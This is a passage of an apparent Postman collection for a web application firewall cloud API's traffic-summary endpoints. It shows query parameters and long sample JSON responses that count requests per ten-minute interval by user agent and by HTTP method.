\"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324800000,\n                \"data\": []\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660326000000,\n                \"data\": []\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"curl/7.68.0\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"curl/7.68.0\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"curl/7.68.0\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660330200000,\n                \"data\": []\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"curl/7.68.0\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"curl/7.68.0\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660340400000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660341000000,\n                \"data\": []\n            }\n        ]\n    }\n}"}],"_postman_id":"5ab71b9d-540f-4e87-9fb9-7dda24cb8073"},{"name":"Get Traffic Log Method Statics Copy","id":"dcf38919-c6d9-4952-bded-7cb514fe742b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/method_statistics?type={{type}}&start_time={{start_time}}&end_time={{end_time}}&page={{page}}&size={{size}}&sort_by={{sort_by}}&filter={{filter}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","traffic_summary","method_statistics"],"host":["api","fortiweb-cloud-qa","com"],"query":[{"description":{"content":"<p>the type of query result only support \"summary\" and \"detail\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>the start time of timespan</p>\n","type":"text/plain"},"key":"start_time","value":"{{start_time}}"},{"description":{"content":"<p>the end time of timespan</p>\n","type":"text/plain"},"key":"end_time","value":"{{end_time}}"},{"description":{"content":"<p>the page number of requested information</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>the result table size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The field will be sorted</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"},{"description":{"content":"<p>For example, for the Agent details table, the filter is{\"http_method\":\"get\"}</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"d5dd5901-52de-4421-a250-4c07a20036a3","name":"Get Traffic Log Method Statics Summary","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/method_statistics?type=summary&start_time=1660254877990&end_time=1660341277990","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","method_statistics"],"query":[{"key":"type","value":"summary","description":"the type of query result only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660254877990","description":"the start time of timespan"},{"key":"end_time","value":"1660341277990","description":"the end time of timespan"},{"key":"page","value":"{{page}}","description":"the page number of requested information","disabled":true},{"key":"size","value":"{{size}}","description":"the result table size","disabled":true},{"key":"sort_by","value":"{{sort_by}}","description":"The field will be sorted","disabled":true},{"key":"filter","value":"{{filter}}","description":"For example, for the Agent details table, the filter is{\"http_method\":\"get\"}","disabled":true}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"get\": {\n            \"count\": 52\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254877990\",\n        \"end\": \"1660341277990\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660326000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 3\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660328400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 12\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660329000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 13\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 11\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660332000000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660340400000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660341000000,\n                \"data\": []\n            }\n        ]\n    }\n}"},{"id":"894ef8d9-90f6-4d0b-8f13-e47479adf36e","name":"Get Traffic Log Method Statics Detail","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/method_statistics?type=details&start_time=1660254967614&end_time=1660341367614&page=1&size=5&sort_by=total_number&filter=%7B%22http_method%22%3A%22get%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","method_statistics"],"query":[{"key":"type","value":"details","description":"the type of query result only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660254967614","description":"the start time of timespan"},{"key":"end_time","value":"1660341367614","description":"the end time of timespan"},{"key":"page","value":"1","description":"the page number of requested information"},{"key":"size","value":"5","description":"the result table size"},{"key":"sort_by","value":"total_number","description":"The field will be sorted"},{"key":"filter","value":"%7B%22http_method%22%3A%22get%22%7D","description":"For example, for the Agent details table, the filter is{\"http_method\":\"get\"}"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"get\": {\n            \"count\": 52\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254967614\",\n        \"end\": \"1660341367614\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 2\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660259400000,\n                \"data\": [\n                    {\n                        \"source\": \"get\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 